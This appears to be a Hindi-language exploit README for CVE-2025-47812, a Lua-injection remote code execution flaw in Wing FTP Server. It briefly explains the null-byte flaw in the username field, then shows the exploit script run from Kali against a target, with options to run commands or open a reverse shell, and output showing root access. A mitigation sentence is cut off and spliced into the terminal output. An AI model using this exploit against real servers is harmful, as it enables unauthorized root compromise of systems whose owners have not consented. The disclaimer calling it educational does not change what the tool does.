
CVE-2025-47812
CVE-2025-47812 एक महत्वपूर्ण रिमोट कोड एक्सेक्यूशन (RCE) कमजोरी है जो 7.4.4 से पहले के Wing FTP Server संस्करणों को प्रभावित करती है। यह एक सुरक्षा शोधकर्ता द्वारा खोजा गया था और सक्रिय रूप से जंगल में शोषण किए जाने की पुष्टि की गई है।
यह कमजोरी Wing FTP Server के प्रमाणीकरण तर्क में निहित है, विशेष रूप से यह username पैरामीटर में नल बाइट (\0) को कैसे संभालता है।
हमलावर यूज़रनेम फ़ील्ड के माध्यम से मनमाना Lua कोड इंजेक्ट कर सकते हैं, जिसे सर्वर सत्र फ़ाइल में लिखेगा। जब यह सत्र फ़ाइल बाद में संसाधित होती है, तो इंजेक्ट किया गया Lua कोड निष्पादित होता है, जिससे हमलावर सिस्टम-स्तरीय कमांड चला सकते हैं।
/loginok.html को अविश्वसनीय नेटवर्क्स पर उजागर नहीं कर रहे हैं।┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
यह शोषण केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसका जिम्मेदारीपूर्वक उपयोग करें और केवल उन प्रणालियों पर जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।